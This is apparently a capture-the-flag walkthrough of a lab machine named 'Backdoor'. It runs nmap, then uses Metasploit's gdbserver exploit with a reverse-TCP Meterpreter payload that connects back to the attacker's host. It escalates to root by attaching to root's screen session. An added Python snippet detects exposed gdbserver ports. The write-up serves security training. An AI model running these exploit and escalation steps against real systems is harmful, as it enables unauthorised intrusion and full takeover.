
Backdoor

Let's start with an nmap scan:

nmap -sC -sV -p- targetIP

The -p- flag scans all 65535 TCP ports; -sC runs the default scripts and -sV probes each open port for service and version information.

We find port 1337 open.


Nmap identifies port 1337 as gdbserver, the GDB remote debugging server.
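The check below is an added example and is not part of the original writeup: it parses nmap's normal output and flags any open port that advertises gdbserver (which executes code for any client able to connect to it) or that nmap could not identify, so an exposed debugger shows up in a routine inventory scan. The sample scan output is constructed.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap -sC -sV -p-` normal output (not from the post).
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http       Apache httpd 2.4.41 ((Ubuntu))
1337/tcp open  gdb        GNU gdbserver
9000/tcp open  cslistener?
"""

# One line of nmap's port table: "<port>/<proto> <state> <service> [version]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap_ports(text: str) -> List[Dict[str, object]]:
    """Extract the port table from nmap normal output; header lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            entry["version"] = entry["version"].strip()
            ports.append(entry)
    return ports


def find_exposed_debuggers(ports: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return open ports that look like gdbserver, plus unidentified services
    (nmap appends '?' to a guessed name) that need manual verification."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        banner = f'{p["service"]} {p["version"]}'.lower()
        if "gdb" in banner:
            findings.append({**p, "reason": "gdbserver has no authentication; any client can run code"})
        elif str(p["service"]).endswith("?"):
            findings.append({**p, "reason": "unidentified service; verify what is listening"})
    return findings


if __name__ == "__main__":
    for f in find_exposed_debuggers(parse_nmap_ports(SAMPLE_NMAP_OUTPUT)):
        print(f'{f["port"]}/{f["proto"]} {f["service"]}: {f["reason"]}')
```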


We find a known vulnerability for this service:



Let's load Metasploit and find the gdbserver module:

msfconsole
search gdbserver

use exploit/multi/gdb/gdb_server_exec

show options

We need to set RHOSTS (remote host) to the IP of the target machine:

set RHOSTS 10.129.96.68

RPORT (remote port) should be port 1337:

set RPORT 1337

We need to set LHOST (local host) to the IP of our own machine. If you don't know the IP of your machine, type ifconfig.

set LHOST 10.10.14.21

We also need to set the payload. By default it is linux/x86/meterpreter/reverse_tcp (32-bit); the target is 64-bit, so we change it to linux/x64/meterpreter/reverse_tcp:

set payload linux/x64/meterpreter/reverse_tcp

We also need to change the target ID. By default it is target ID 0 (x86, 32-bit); we need target ID 1 (x86_64, 64-bit):

set target 1

Now let's check again that everything is configured properly:

show options

Let's run the exploit:

exploit

Once the Meterpreter session opens, drop into a system shell and upgrade it to a proper TTY:

shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

whoami

ls
cat user.txt

We got the user flag!



Let's try privilege escalation with the usual first check:

sudo -l

It asks for a password, which we don't have:


Now let's set a terminal type so screen can attach:

export TERM=xterm

Then attach to the existing screen session owned by root:

/usr/bin/screen -x root/root

We are now root!


ls
cat root.txt

We got the root flag!


Congratulations!


